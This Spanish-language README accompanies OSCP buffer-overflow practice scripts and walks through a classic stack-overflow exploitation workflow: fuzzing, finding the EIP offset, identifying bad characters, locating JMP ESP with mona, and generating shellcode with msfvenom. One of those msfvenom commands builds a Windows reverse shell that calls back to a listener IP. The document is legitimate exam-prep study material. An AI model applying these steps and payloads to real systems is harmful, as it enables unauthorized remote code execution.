# buffer-overflow

Este proyecto contiene los scripts de Python utilizados para los ejercicios de OSCP. Además contiene notas que pretenden ser utilizadas como guion para cuando se haga el ejercicio de buffer overflow.


## pasos
1. **Entender como interactuar con el software vulnerable**: Se trata de
entender el parámetro vulnerable y como se interacciona con el software.
El objetivo es tener el código de pyhton que manda un determinado buffer al
sofware. Utilizar sl script **simple-connect.py**
2. **Petar el software**: El objetivo básico es ir enviando buffers cada vez
más largos al servidor para sacar un buffer length razonable. Utilizar el script
**bug-trigger-incremental.py**
3. **Sacar el offset**: El objetivo es entender, dentro del buffer enviado,
en que offset exactamente se sobrescribe el EIP. Utilizar los scripts
**offset-test.py** para calcular el offset y **offset-confirmation.py** para
confirmarlo
4. **Identificación de badchars**: Identificar los caracteres que truncan el
input, etc. El objetivo es terminar con la lista de todos los caracteres que
no pueden formar parte del payload para explotación. Utilizar el script
**badchars-identify.py**
5. **Encontrar un JMP ESP que nos valga**: Se puede buscar directamente en el
software o buscarlo en algún módulo. En cualquier caso, se puede confirmar que
realmente tenemos execution flow control utilizando el script
**flow-control-check.py**
6. **Comprobar el espacio disponible pare el shellcode**: Comprobar que el
el numero de caracteres que somos capaces de escribir en la memoria donde
apunta ESP es suficiente para incluir un shellcode y que no se trunca,
es importante tener en cuenta esto, no vaya a ser que no tengamos suficiente
espacio
7. **Fun & profit**: Explotación, bien sacar una calc.exe o reverse shell.
Utilizar los scripts **exploit-calc.py** y **exploit-reverse-shell.py**
respectivamente


## scripts
Relación de para qué sirve para cada uno de los scripts, brevemente:
* **simple-connect.py** simplemente manda un buffer determinado a un RHOST y un
RPORT dados, y muestra la respuesta del servidor en la consola. Tiene tres
variables configurables: BUFF, RHOST y RPORT, no hace falta mucha explicación
* **bug-trigger.py** manda un buffer de 1024 A's. El objetivo es simplemente hacer
crash al programa, para saber más o menos en qué longitud de buffer estamos
trabajando
* **offset-test.py**: sirve para enviar el string generado por la herramienta
pattern_create.rb para poder conocer el offset que sobrescribe el EIP. Dos
variables triviales a modificar: RHOST y RPORT. BUFF es el buffer a enviar, que
habrá que sobrescribirlo con la salida que nos de pattern_create.rb
* **bug-trigger-incremental.py** hace lo mismo que bug-trigger.py, solamente que va
mandado buffers de As de cada vez más longitud. Empieza por 100 As y va
incrementando de 200 en 200, hasta que el programa peta y entonces para
* **offset-confirmation.py** sirve para confirmar que tenemos EIP control. Toma cuatro
parmámetros. RHOST y RPORT, que no necesitan explicación. OFFSET, que es el
el offset que sobrescribe el EIP, es decir, la salida de pattern_offset.rb.
PAYLOAD_LENGTH es la longitud del payload con la que estamos trabajando
* **badchars-identify.py** se utilizar para la tarea de identificar badchars que el
binario no acepta. Se le pueden modificar las siguientes cuatro variables que
son triviales: RHOST, RPORT, OFFSET, PAYLOAD_LENGTH. La variable BAD_CHARS es
un string que contiene todos los badchars que se van a enviar. La que está
comentada contiene todos, de manera que se puede copiar y pegar para empezar.
Además de enviar los badchars, el script crea el archivo badchars-compare.bin,
que simplemente contiene el payload de badchars enviado, de manera que se pueda
utilizar para hacer la comparación con mona
* **exploit-calc.py**: Contiene un exploit para abrir la calculadora. Las variables
triviales: RHOST, RPORT, OFFSET, PAYLOAD_LENGTH. La variable JMP_ESP_ADDR
contiene el codigo de la instruccion `sub esp,0x10`, que mueve el stack pointer
para evitar que el decoder del shell nos pise el propio shell. JMP_ESP_ADDR es
la dirección de la instrucción JMP ESP que hemos encontrado, el priopio script
la transforma a little indian. SHELLCODE_CALC es el propio shellcode, en los
comentarios está el comando de msfvenom utilizado para generarlo
* **exploit-reverse-shell.py**: Contiene un exploit para abrir una reverse shell
simple que con un netcat se puede pillar. Las variables triviales: RHOST, RPORT,
OFFSET, PAYLOAD_LENGTH. La variable SHELLCODE_REVERSE_SHELL es el Shellcode
con el código para abrir la reverse shell. En los comentarios está apuntado el
comando de msfvenom utilizado para generarlo
* **flow-control-check.py**: Sirve para confirmar que tenemos control del
execution flow una vez hemos encontrado la dirección de una JMP ESP que nos
valga. La idea es que coloca instrucciones INT 3 donde se redirige la ejecución,
de manera que, si la ejecución se redirige correctamente, se producirá una
interrupción y el programa se parará, confirmando que de verdad controlamos la
ejecución y nuestro código arbitrario es ejecutado.

## Comandos

### Generar payload secuencia unica
Comando para generar un buffer de secuencias únicas, utilizado para sacar el
offset que realmente sobrescribe el IP:
```shell
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
```
Donde 1024 es la longitud en caracteres, por supuesto se puede poner cualquier
longitud.

### Conocer el offset the sobrescribe el EIP
Comando para conocer el offset exacto dado el valor que toma el EIP:
```shell
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39654138
```
Donde 39654138 es el valor de EIP después de que pete el programa, variará en
cada caso.

### Compara con mona contenido de memoria con un archivo
Comando de mona que se puede utilizar para comparar el contenido de la memoria
a la que apunta ESP con un archivo binario. El archivo binario serían los
badchars que se han enviado al servidor. De manera que así se compara de una
forma rápida si todos los chars se han copiado al stack sin problemas:
```shell
!mona cmp -a esp -f c:\Users\Desktop\const\badchars-compare.bin
```
Donde, lógicamente, el nombre del archivo variará en cada caso.

### Buscar instrucción JMP ESP con !mona
Comando de mona para buscar instrucciones JMP ESP:
```shell
!mona jmp -r esp -cpb "\x00\x0A"
```

### Buscar modulos con !mona
Comando para buscar modulos con !mona. Se puede utilizar para cuando el comando
de buscar JMP ESP en el programa no nos da ningun resultado. Para que un módulo
nos valga, no debe tener protecciones, es decir, que los valores de *Rebase*,
*SafeSEH*, *ASLR* y *NXCompat* estén a false.
```shell
!mona modules
```

### Buscar la instrucción JMP ESP dentro de un módulo con !mona
Después de encontrar un módulo que no tenga protecciones, para buscar una 
instrucción JMP ESP dentro del mismo:
```shell
!mona find -s "\xff\xe4" -m "<module>"
```
Donde \xff\xe4 es el machine code para JMP ESP, y \<module\> es el nombre del
módulo donde queremos buscar

### msfvenom generar payload calc.exe
El flag -cpb permite buscar en memorias que no contengan esos caracteres, de
manera que ahí le tendríamos que pasar los badchars que ya deberíamos haber
identificado en este punto.

Comando de msfvenom para generar un shellcode que abra la calculadora en
windows:
```shell
msfvenom -p windows/exec -b '\x00\x0A' -f python --var-name SHELLCODE_CALC CMD=calc.exe EXITFUNC=thread
```
El flag -b es para poner los badchars. CMS es el comando que se desea ejecutar,
que en este caso es calc.exe para abrir la calculadora

### msfvenom generar payload reverse shell
Comando de msfvenom para generar una shellcode que abre una reverse shell
sencilla, que se puede gestionar un listener netcat:
```shell
msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' -f python --var-name SHELLCODE_REVERSE_SHELL  EXITFUNC=thread LPORT=4444 LHOST=192.168.52.134
```
Todos los parámetros son más o menos triviales. El parámetro -b sirve para
indicarle a msfvenom badchars que no se pueden utilizar

### Traducir una instrucción a machine code
A veces es necesario traducir a hexadecimal un determinado código en
ensamblador, como por ejemplo JMP ESP:
```shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
```
En la shell que se abre podremos meter ahí ensamblador y nos irá traduciendo al
equivalente machine code
